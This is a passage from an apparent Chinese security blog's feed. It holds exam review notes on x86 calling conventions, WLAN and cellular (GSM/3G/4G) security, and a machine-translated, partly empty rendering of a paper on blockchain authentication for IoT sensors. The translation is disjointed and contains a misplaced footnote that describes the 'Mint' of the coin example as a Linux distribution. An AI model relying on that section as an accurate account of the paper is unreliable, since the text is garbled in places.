class="line">//保存寄存器中的值,防止后边程序使用寄存器而改变其值</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">retn 8 //被调用方清栈(被调用方调整栈帧);ret先返回到EIP,随后,相当于add esp,8</span><br></pre></td></tr></table></figure><p>+++</p><h4 id="thiscall"><a href="#thiscall" class="headerlink" title="thiscall"></a>thiscall</h4><p>对象存在于堆上,不在栈里;</p><p>调用方:</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C48.png" alt="3"></p><p>ecx中存放当前调用的对象的指针this;</p><p>eax默认存放返回值;</p><p>被调用方:</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C49.png" alt="3"></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">lea ecx,[ebp+var_4]//this指针获取</span><br><span class="line"></span><br><span class="line">retn 8 //被调用方清栈(被调用方调整栈帧);ret先返回到EIP,随后,相当于add esp,8</span><br></pre></td></tr></table></figure><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C50.png" alt="3"></p><p>+++</p><h3 id="4、简单的软件保护技术举例"><a href="#4、简单的软件保护技术举例" class="headerlink" title="4、简单的软件保护技术举例"></a>4、简单的软件保护技术举例</h3><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C51.png" alt="3"></p><p>+++</p><h3 id="5、Windows的内核原理"><a href="#5、Windows的内核原理" class="headerlink" title="5、Windows的内核原理"></a>5、Windows的内核原理</h3><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C52.png" alt="3"></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C11.png" alt="6"></p><p>+++</p><p>发展过程中的变化;</p><p>+++</p><h3 id="1、移动网络的分类和安全风险"><a href="#1、移动网络的分类和安全风险" class="headerlink" title="1、移动网络的分类和安全风险"></a>1、移动网络的分类和安全风险</h3><p>分类:</p><p>无线局域网(WLAN)、无线个域网(WPAN)、无线体域网(WBAN)、无线城域网(WMAN)、无线广域网(WWAN)</p><p>安全风险:</p><ul><li>有线网络</li><li>无线网络</li></ul><p>+++</p><h3 id="2、WLAN安全机制—-WEP,IEEE-802-11i-WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等"><a href="#2、WLAN安全机制—-WEP,IEEE-802-11i-WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等" class="headerlink" title="2、WLAN安全机制—-WEP,IEEE 802.11i(WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等)"></a>2、WLAN安全机制—-WEP,IEEE 802.11i(WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等)</h3><h4 id="1、WEP"><a href="#1、WEP" class="headerlink" title="1、WEP"></a>1、WEP</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C10.png" alt="3"></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C11.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C12.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C13.png" alt="3"></p><p>WEP的安全问题:</p><ul><li>RC4算法的使用(存在大量弱密钥;每256个密钥就有一个;建议:抛弃RC4输出的前256比特)</li><li>Ⅳ的使用(空间太小,生日攻击)</li><li>SK的产生与分发(无密钥交换/管理机制)</li><li>CRC32算法的使用(CRC32是线性的)</li><li>无抗重放攻击</li></ul><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C14.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C15.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C16.png" alt="3"></p><h4 id="2、IEEE-802-11i"><a href="#2、IEEE-802-11i" class="headerlink" title="2、IEEE 802.11i"></a>2、IEEE 802.11i</h4><ul><li>TSN(过度安全网络)</li><li>RSN(坚固安全网络)</li></ul><h4 id="3、WPA"><a href="#3、WPA" class="headerlink" title="3、WPA"></a>3、WPA</h4><p>802.11i草案中一部分;</p><h4 id="4、加密机制TKIP—(暂时密钥完整性协议)"><a href="#4、加密机制TKIP—(暂时密钥完整性协议)" class="headerlink" title="4、加密机制TKIP—(暂时密钥完整性协议)"></a>4、加密机制TKIP—(暂时密钥完整性协议)</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C17.png" alt="3"></p><h4 id="5、加密机制CCMP—基于AES"><a href="#5、加密机制CCMP—基于AES" class="headerlink" title="5、加密机制CCMP—基于AES"></a>5、加密机制CCMP—基于AES</h4><p><font color="#ff000" face="黑体" size="4">CCMP☆☆☆</font></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C18.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C19.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C20.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C21.png" alt="3"></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C22.png" alt="3"></p><p>+++</p><h3 id="3、移动通信安全机制—-GSM、3G、4G"><a href="#3、移动通信安全机制—-GSM、3G、4G" class="headerlink" title="3、移动通信安全机制—-GSM、3G、4G"></a>3、移动通信安全机制—-GSM、3G、4G</h3><h4 id="1、GSM"><a href="#1、GSM" class="headerlink" title="1、GSM"></a>1、GSM</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C23.png" alt="3"></p><p>+++</p><p>GSM系统的安全目标:</p><ul><li>用户身份认证:保证网络不被未授权者使用</li><li>数据机密性:</li><li>用户身份(IMSI)保密:<ul><li>IMSI(国际移动用户标识)不被泄露给未授权的个人、实体或过程</li></ul></li></ul><p>+++</p><p><strong>GSM安全分析</strong>:</p><ul><li>认证:挑战—-响应,长期密钥没有泄露</li><li>加密:空中接口(即用户到基站部分)</li><li>匿名:TMSI</li></ul><p><strong>GSM的不足</strong>:</p><ul><li>认证:单向认证,且三元组可无限期使用</li><li>加密:没有实现端到端的加密</li><li>完整性:无</li></ul><p>+++</p><h4 id="2、3G☆☆☆认证和密钥协商过程"><a href="#2、3G☆☆☆认证和密钥协商过程" class="headerlink" title="2、3G☆☆☆认证和密钥协商过程"></a>2、3G<font color="#ff000" face="黑体" size="4">☆☆☆认证和密钥协商过程</font></h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C53.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C24.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C25.png" alt="3"></p><p>+++</p><ul><li><p>3G的安全目标:</p><ul><li><p>对用户模块(UE)进行<strong>认证</strong>,特别是用户服务标识模块(USIM)</p></li><li><p>向UE和服务网络SN提供<strong>会话密钥</strong></p></li><li><p>在会话密钥的保护下在UE和SN之间<strong>建立安全连接</strong></p></li></ul></li></ul><ul><li><p><strong>3G的层次</strong>:</p><ol><li>应用层</li><li>归属/服务层</li><li>传输层</li></ol></li></ul><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C26.png" alt="3"></p><p>+++</p><ul><li>3G安全功能结构</li></ul><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C27.png" alt="3"></p><ul><li>增强用户身份保密EUIC( Enhanced User Identity Confidentiality):通过归属网对移动用户智能卡身份信息进行认证</li><li>用户身份保密UIC( User Identity Confidentiality)</li><li>认证和密钥协商AKA( Authentication& Key agreement):用于USIM卡、VLR、HLR间进行双向认证和密钥分发</li><li>用户及信令数据保密DC:加密UE与RNC间信息</li><li>消息认证DI:认证消息的完整性、时效以及消息的来源地与目的地</li></ul><p>+++</p><h4 id="3、4G"><a href="#3、4G" class="headerlink" title="3、4G"></a>3、4G</h4><ul><li><p><strong>4G系统的组成:</strong></p><ul><li><p>移动终端</p></li><li><p>无线接入网</p></li><li><p>无线核心网</p></li><li><p>IP骨干网</p></li></ul></li></ul><ul><li>4G的安全威胁<ul><li>现有的无线网络和Internet的安全威胁依然存在<ul><li>4G的终端与各种应用的交互更为复杂,威胁也越多</li></ul></li></ul></li></ul><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C28.png" alt="3"></p>]]></content>
<summary type="html">
<p>[TOC]</p>
<p>+++</p>
<p>1、Web安全</p>
<p>2、逆向安全</p>
<p>3、移动通信安全</p>
<h4 id="题型:"><a href="#题型:" class="headerlink" title="题型:"></a><strong>
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>P2P networking based internet of things (IoT) sensor node authentication by Blockchain</title>
<link href="https://singlemindedt.github.io/2020/05/29/P2P%20networking%20based%20internet%20of%20things%20(IoT)%20sensor%20node%20authentication%20by%20Blockchain(%E5%9F%BA%E4%BA%8EP2P%E7%BD%91%E7%BB%9C%E7%9A%84%E7%89%A9%E8%81%94%E7%BD%91%EF%BC%88IoT%EF%BC%89%E4%BC%A0%E6%84%9F%E5%99%A8%E8%8A%82%E7%82%B9%E5%8C%BA%E5%9D%97%E9%93%BE%E8%AE%A4%E8%AF%81)/"/>
<id>https://singlemindedt.github.io/2020/05/29/P2P networking based internet of things (IoT) sensor node authentication by Blockchain(基于P2P网络的物联网(IoT)传感器节点区块链认证)/</id>
<published>2020-05-29T10:20:08.000Z</published>
<updated>2020-07-29T11:05:24.949Z</updated>
<content type="html"><![CDATA[<h2 id="P2P-networking-based-internet-of-things-IoT-sensor-node-authentication-by-Blockchain-基于P2P网络的物联网(IoT)传感器节点区块链认证"><a href="#P2P-networking-based-internet-of-things-IoT-sensor-node-authentication-by-Blockchain-基于P2P网络的物联网(IoT)传感器节点区块链认证" class="headerlink" title="P2P networking based internet of things (IoT) sensor node authentication by Blockchain(基于P2P网络的物联网(IoT)传感器节点区块链认证)"></a>P2P networking based internet of things (IoT) sensor node authentication by Blockchain(基于P2P网络的物联网(IoT)传感器节点区块链认证)</h2><h3 id="Abstract"><a href="#Abstract" class="headerlink" title="Abstract"></a>Abstract</h3><p>传感器节点在物联网环境中起着重要作用,每个传感器都是对等网络。由于物理尺寸有限,物联网 传感器节点必须具有轻量认证协议。物联网(IoT)是各种技术的集合 元素。期望异构终端,网络和应用程序之间的互通。他们会加速 通过物联网平台的开放。结果,物联网将出现许多技术和管理安全威胁 环境。传感器节点协议必须轻巧且安全。由于物联网设备有多种用途,因此 需要性能的设备,具有可正常工作的高性能芯片组的操作系统,大多数密码协议。但是,转 点亮/熄灭IoT设备执行简单的任务,例如基于不运行OS的低性能芯片组。如果有 不支持加密协议或证书,则容易受到攻击,并且性能不足以处理。因此, 本文提出了一种基于区块链的物联网设备,以获取更安全的身份验证方案。</p><p><strong>Keywords</strong>: P2P networking . Sensor network . Secure IoT . Node authentication . Light-weight protocol . Network security</p><h3 id="1-Introduction"><a href="#1-Introduction" class="headerlink" title="1 Introduction"></a>1 Introduction</h3><p>物联网(IoT)服务容易受到各种攻击 物联网技术的本质带来的安全威胁。特别是,它具有有限的硬件规格,例如低功耗 消耗,少量内存,低内存等, 并且往往分布在难以管理的环境中,这可能会带来各种安全威胁 包括物理攻击的因素。这些特征可以 导致物联网服务安全运行中的致命错误 平台或基于错误信息提供服务, 导致物联网服务平台失去其功能[1]。 </p><p>近年来,预计互操作性 异构终端,网络和应用程序之间 将通过物联网平台的开放而加速, 导致各种技术和行政安全 威胁。物联网环境中可能发生的安全威胁 继承现有威胁中可能发生的威胁 ICT(信息和通信技术)环境。机密性,完整性和可用性(CIA)可以 通常被视为对合法商品的使用和交付的威胁 服务,通常被称为CIA,这三个主要 信息安全的组成部分[2]。表1显示了 物联网每个组件中可能发生的安全威胁[3]。 因此,物联网设备需要一种访问控制方法来保护设备免受单个用户的平台内身份验证以及未经授权的用户对设备的任意访问。 各种环境和各种物联网的服务平台 服务平台和平台应用程序服务[4-6]。</p><p>当前物联网环境中可能发生的安全问题 [3]。 已经开发出各种认证协议,直到 最近。 但是,大多数提议的身份验证协议都用于跟踪位置跟踪攻击的位置。 一个 重播攻击或欺骗攻击易受欺骗攻击 [3]。 许多网站都有弱点和侵犯隐私的行为。 研究人员 正在发现它[5]。 因此,这项研究工作提出了 基于区块链的对等身份验证方案 使用加密算法进行链接和保护。 每个块 具有哈希指针,通常作为指向前一个的符号链接 块,时间戳和交易数据[11]。 根据设计, 区块链固有地抗拒更改数据。</p><p>从技术上讲,区块链可以充当“一个开放的,分布式的分类帐,可以高效,可验证且永久地记录双方之间的交易”。 [12]用作 分散的分类帐,传统上,区块链由 对等网络节点共同遵守协议 用于验证新块。记录后,任何给定的数据 如果没有全部更改,则无法追溯更改块 随后的块和网络多数的冲突[13]。 区块链比非区块链算法更安全[26]。 但是,需要在性能和安全性之间进行权衡。 如果安全交易比效率更重要,那么 区块链是物联网通信的最佳解决方案。 其余研究组织如下。第二节 讨论无线方面一些当前存在的协议 传感器网络(WSN)第3和4节介绍了详细信息 提出的算法。第5节描述了结论 和未来的工作。</p><h3 id="2-Related-work"><a href="#2-Related-work" class="headerlink" title="2 Related work"></a>2 Related work</h3><h4 id="2-1-Wireless-sensor-networks"><a href="#2-1-Wireless-sensor-networks" class="headerlink" title="2.1 Wireless sensor networks"></a>2.1 Wireless sensor networks</h4><p>WSN可以广泛应用于实时等领域 交通监控,军事数据收集,地震活动 分散度测量和时间污染测量。 由于WSN由超小型传感器组成,因此存在一些限制,例如存储内存,计算量和能量 通讯半径。 提供安全的无线通信是一个非常重要的问题,因为传感器可能会暴露在恶劣的环境中,容易拦截无线 通讯,恶意攻击者可以篡改 消息或尝试重传攻击[10]。</p><p>安全的WSN通信的各个方面 研究。 WSN非常容易受到传感器节点(SN)的硬件设备以及节点检测,损坏,窃听, 拒绝服务攻击和路由攻击(例如,漏洞和蠕虫漏洞)取决于无线网络的特征[1]。</p><p>由于传感器节点的性质有限,因此不容易 应用现有的WSN安全技术。 因此, 正在研究加权密钥分发和认证方案,以实现消息等安全因素 完整性,机密性和节点身份验证。</p><p>应用轻量级公钥有两种方法 具有大量现有计算以适合 传感器节点和μ-TESLA(定时的“微型”版本, 高效,流式,容错认证协议) 和LEAP(轻量级可扩展身份验证协议) 低计算能力和安全密钥分发的SPINS(安全网络加密协议)[24]设计 [22]。 </p><p>PIKE(密钥建立同行机构)[25]具有 提出了一种确保网络安全的密钥分配方案 基于对称密钥的安全性基于对称密钥的公开。 另外,不需要密钥的基于ID的方案 分布以及在消息传输频率上具有优势的问题也在研究中。</p><p>由于无线通信的本质,WSN的缺点是容易窃听消息[7]。 因此,为了防止这种情况,有必要通过加密和交换数据来确保机密性。</p><p>为了生成认证密钥,所有SN进行通信 直接与基站(BS)。 其实很难 与SN和BS直接通信。 </p><p>如果能量有限的节点尝试通信 直接与远程BS进行通信,则能耗为 通过发送和接收身份验证消息而增加。 消耗这种能量的节点不能 长期参与交流[10]。</p><h3 id="2-2-Light-weight-sensor-networks-protocols"><a href="#2-2-Light-weight-sensor-networks-protocols" class="headerlink" title="2.2 Light-weight sensor networks protocols"></a>2.2 Light-weight sensor networks protocols</h3><p>有一些基于轻量级公钥的协议,并且 它们是由μ-TESLA[21],LEAP [22]和SPINS [23]设计的 具有较低的计算能力和安全的密钥分发。 传感器节点在物联网环境中起着重要作用。 传感器 节点是物联网的关键。 因此,许多研究人员正在专注于 传感器节点的攻击承受能力和有效的通信 协议。</p><p>物联网存在一些问题,详细信息如下。</p><p> 互联网基于ICT(互联网通信) 技术),这是一种智能环境,可在用户与对象之间以及对象与对象之间传递信息 通过连接工作。</p><p>美国市场研究公司Gartner 选择物联网作为最受关注的技术领域[8]。 物联网是 分为三大类:设备(终端/传感器) 区域,网络(有线/无线)区域和服务接口 (平台/应用程序)区域。 设备区域传输数据 从特定对象收集并提取到另一个对象 使用嵌入在对象中的通信功能。 网络区域是一个有线/无线通道,用于 传输/接收用户与 对象,对象到对象。 服务接口区域处理数据以生成信息,并控制和管理 各种设备。</p><h3 id="2-3-Vulnerability-on-IoT"><a href="#2-3-Vulnerability-on-IoT" class="headerlink" title="2.3 Vulnerability on IoT"></a>2.3 Vulnerability on IoT</h3><p>虚假攻击是指攻击者伪装成 传感器网络中的合法服务器以及客户端 发出身份验证请求,继续执行协议, 非法获取传感器或传感器的认证密钥 用户。重传攻击是指在认证过程中,实体之间的认证过程中使用的组件 传感器网络将在后续的身份验证过程中存储和重用[9]。</p><p> 身份验证密钥猜测攻击是对 攻击者窃听或伪装传感器网络中用户到传感器与传感器到传感器之间的身份验证过程,存储发送和接收的元素,并找到与最终商定的密钥相同的密钥 认证密钥[22]。 </p><p>拒绝服务攻击是指攻击者进行的攻击 参与身份验证过程并拦截 即使传感器或用户请求身份验证也可以做出响应, 从而拒绝身份验证服务。 </p><p>隐私侵害是一种侵犯隐私的行为,它通过从发送的元素中暴露出参与通信的主体 并在传感器上的身份验证过程中收到 网络。</p><h3 id="2-4Attack-model(攻击模型-)"><a href="#2-4Attack-model(攻击模型-)" class="headerlink" title="2.4Attack model(攻击模型 )"></a>2.4Attack model(攻击模型 )</h3><p>本研究中的攻击模型可以是DoS攻击。 在DoS中 攻击,攻击者正试图逃避或冒充 通过发送伪装的假消息来合法的IoT设备 作为合法的物联网设备。 类似的情况可能在 点对点网络也是如此。 例如,合法的物联网 连接到其他物联网设备的节点设备,其中一些 可能是合法的,而其他人可能是恶意的。 这可能 最终导致网络拥塞并拒绝某些物联网 设备访问一些数据流。 问题是 将影响物联网设备的认证过程。 因此,与集中式系统相比,攻击者 正在处理所有都具有的物联网设备 区块链的当前状态。 因此,可以得出结论 DoS攻击很难通过对等网络进行,以损害整个网络的安全性 物联网数量众多导致网络和区块链 设备。</p><h3 id="3-Blockchain-based-sensor-node-authentication"><a href="#3-Blockchain-based-sensor-node-authentication" class="headerlink" title="3 Blockchain-based sensor node authentication"></a>3 Blockchain-based sensor node authentication</h3><p>作者应该有足够的背景信息来 提供本文中所建议方法的更多接受</p><h4 id="3-1-Blockchain"><a href="#3-1-Blockchain" class="headerlink" title="3.1 Blockchain"></a>3.1 Blockchain</h4><p>因为任何参与使用区块链的人 可以输入,更改或删除数据,TTP(信任第三方) 不需要存在就可以在不诚实的网络各方之间进行交易。为了验证这种交易,使用共识算法,可以保证存储在其中的数据的可靠性 经过授权用户之间特定机制操作后的区块链。从而安全地更新和维护 区块链的状态,确保 区块链图1将电子硬币定义为 数字签名。每个成员将硬币转发到下一个 通过数字签名先前交易的哈希值和 下一个成员的公共密钥,将它们添加到 硬币。收款人可以验证签名以验证 成员资格[14]。区块链如图1所示。 当前块的值,数字签名,哈希值 对等网络。应用(2020)13:579–589 581 当前块,块标题和Merkle根以及块 数据由交易组成。</p><p>问题是收件人无法验证其中之一 业主不是双花硬币。常见的解决方案是 介绍一个可靠的中央机构,薄荷,交易 双重支出。每次交易后必须返回 硬币造币厂。 </p><p>我们相信不会发行新硬币,只会发行硬币 由Mint1直接发行的将被重复使用。与问题 这个解决方案是整个瞬时系统的命运。 公司需要经营造币厂,并将其全部通过 交易通过银行进行。收件人以前没有签署过先前的会员交易。制作的唯一方法 确保没有涉及所有交易的交易。基于薄荷 模型,薄荷知道所有交易。我决定到达 第一。为了在没有可信任方的情况下实现这一目标,公开宣布了他们收到的订单。在每次交易时,大多数节点都同意这是第一次[14]。</p><p> 构成区块链的区块由区块组成 标头和块体。块头包含哈希 前一个块标题的值,所有块都是 通过链表之类的链表方法连接起来,并且 包括用于共识的任意随机数 调整块生成难度的算法和位。块体可以具有不同的值,具体取决于 他们支持的服务。例如,在比特币中,数字 密码系统,用户之间发生的交易 块体中包含10分钟。区块链可能 成为公共区块链,私有区块链,财团 区块链可以分为三类[15]。每个块体 磷在结构上完全相似。但是,他们 具有不同的概念和功能,并且在每个区块链上定义和实现也有先决条件。 公共区块链是用于普遍使用的区块链 被称为比特币,以及私有区块链或财团 区块链是将区块链用于其他方面的概念 目的。</p><h4 id="3-2-Conventional-IoT-sensor-nodes-authentication-types"><a href="#3-2-Conventional-IoT-sensor-nodes-authentication-types" class="headerlink" title="3.2 Conventional IoT sensor nodes authentication types"></a>3.2 Conventional IoT sensor nodes authentication types</h4><p>在物联网环境中,攻击者伪装成物联网 具有各种攻击(例如攻击,重用攻击, 和DoS攻击被允许访问内部 物联网环境。 </p><p>在现有的物联网环境中,有五种不同的 身份验证协议的类型。 表1显示了优点 每种认证技术的利弊[15]。</p><h4 id="3-2-1-ID-based-authentication"><a href="#3-2-1-ID-based-authentication" class="headerlink" title="3.2.1 ID-based authentication"></a>3.2.1 ID-based authentication</h4><p>基于ID的身份验证通过使用用户的电子邮件地址,名称,IP地址提供数字签名和身份验证 作为公钥密码系统。 预分配的密钥不是 需要。 计算量小,密钥长度为 比较短。 但是,它容易受到ID欺骗攻击的攻击。 有赫斯算法,林恩算法,绅士 图1交易中的区块链 1 Mint是基于Debian和Ubuntu的Linux发行版,很容易 采用。 582对等网络 应用 (2020)13:579–589 和Silverberg的算法,以及各种身份验证 方案[15]。</p><h4 id="3-2-2-Certificate-based-authentication"><a href="#3-2-2-Certificate-based-authentication" class="headerlink" title="3.2.2 Certificate-based authentication"></a>3.2.2 Certificate-based authentication</h4><p>一种使用数字签名进行认证的方法 公钥密码系统,将用于电子签名的信息记录在证书中,并根据该信息执行身份验证。 在韩国,有关 已通过《数字签名法》准备了发行系统和授权证书的管理 成立于1999年,并颁发了证书 由根CA进行最高级别的认证 机构通过五个授权的认证机构。 在外面 在整个国家,Verisign的设备认证服务包括 个人设备,电缆调制解调器设备认证,以及 WiMAX行业认证。 另外,基于证书 身份验证技术正在VoIP,网络监控摄像头等中使用,并且该领域正在逐步扩大。</p><p>基于证书的身份验证技术提供了很高的 通过强大的身份验证功能实现安全性并提供不可否认性。 但是,设备证书处理 软件和算法需要很高的计算吞吐量。 因此,它不适合用于低功耗,低性能的物联网设备。</p><h4 id="3-2-3-Cryptography-protocol-based"><a href="#3-2-3-Cryptography-protocol-based" class="headerlink" title="3.2.3 Cryptography protocol based"></a>3.2.3 Cryptography protocol based</h4><h4 id="3-2-4-MAC-address-based-authentication"><a href="#3-2-4-MAC-address-based-authentication" class="headerlink" title="3.2.4 MAC address based authentication"></a>3.2.4 MAC address based authentication</h4><h4 id="3-2-5-ID-password-based-authentication"><a href="#3-2-5-ID-password-based-authentication" class="headerlink" title="3.2.5 ID/password-based authentication"></a>3.2.5 ID/password-based authentication</h4><h3 id="4-Proposed-P2P-networking-based-IoT-sensor-authentication-by-Blockchain"><a href="#4-Proposed-P2P-networking-based-IoT-sensor-authentication-by-Blockchain" class="headerlink" title="4 Proposed P2P networking based IoT sensor authentication by Blockchain"></a>4 Proposed P2P networking based IoT sensor authentication by Blockchain</h3><h4 id="4-1-Requirements"><a href="#4-1-Requirements" class="headerlink" title="4.1 Requirements"></a>4.1 Requirements</h4><h4 id="4-2-Device-authentication-method"><a href="#4-2-Device-authentication-method" class="headerlink" title="4.2 Device authentication method"></a>4.2 Device authentication method</h4><h4 id="4-3-Hacking-scenario-on-IoT-authentication"><a href="#4-3-Hacking-scenario-on-IoT-authentication" class="headerlink" title="4.3 Hacking scenario on IoT authentication"></a>4.3 Hacking scenario on IoT authentication</h4><h5 id="4-3-1-Jamming-attack-assumption"><a href="#4-3-1-Jamming-attack-assumption" class="headerlink" title="4.3.1 Jamming attack assumption"></a>4.3.1 Jamming attack assumption</h5><h4 id="4-4-Proposed-IoT-authentication-by-Blockchain"><a href="#4-4-Proposed-IoT-authentication-by-Blockchain" class="headerlink" title="4.4 Proposed IoT authentication by Blockchain"></a>4.4 Proposed IoT authentication by Blockchain</h4><h4 id="4-5-Proposed-IoT-multiple-level-node-authentication-model"><a href="#4-5-Proposed-IoT-multiple-level-node-authentication-model" class="headerlink" title="4.5 Proposed IoT multiple-level node authentication model"></a>4.5 Proposed IoT multiple-level node authentication model</h4><h3 id="5-Conclusions"><a href="#5-Conclusions" class="headerlink" title="5 Conclusions"></a>5 Conclusions</h3>]]></content>
<summary type="html">
<h2 id="P2P-networking-based-internet-of-things-IoT-sensor-node-authentication-by-Blockchain-基于P2P网络的物联网(IoT)传感器节点区块链认证"><a href="#P2P-netwo
</summary>
<category term="translation" scheme="https://singlemindedt.github.io/tags/translation/"/>
</entry>
<entry>
<title>简单逆向</title>
<link href="https://singlemindedt.github.io/2020/05/11/%E7%AE%80%E5%8D%95%E9%80%86%E5%90%91/"/>
<id>https://singlemindedt.github.io/2020/05/11/简单逆向/</id>
<published>2020-05-11T08:32:31.000Z</published>
<updated>2020-05-14T17:03:28.570Z</updated>
<content type="html"><![CDATA[<h2 id="程序一、字节序"><a href="#程序一、字节序" class="headerlink" title="程序一、字节序"></a>程序一、字节序</h2><h3 id="程序源码"><a href="#程序源码" class="headerlink" title="程序源码"></a>程序源码</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span 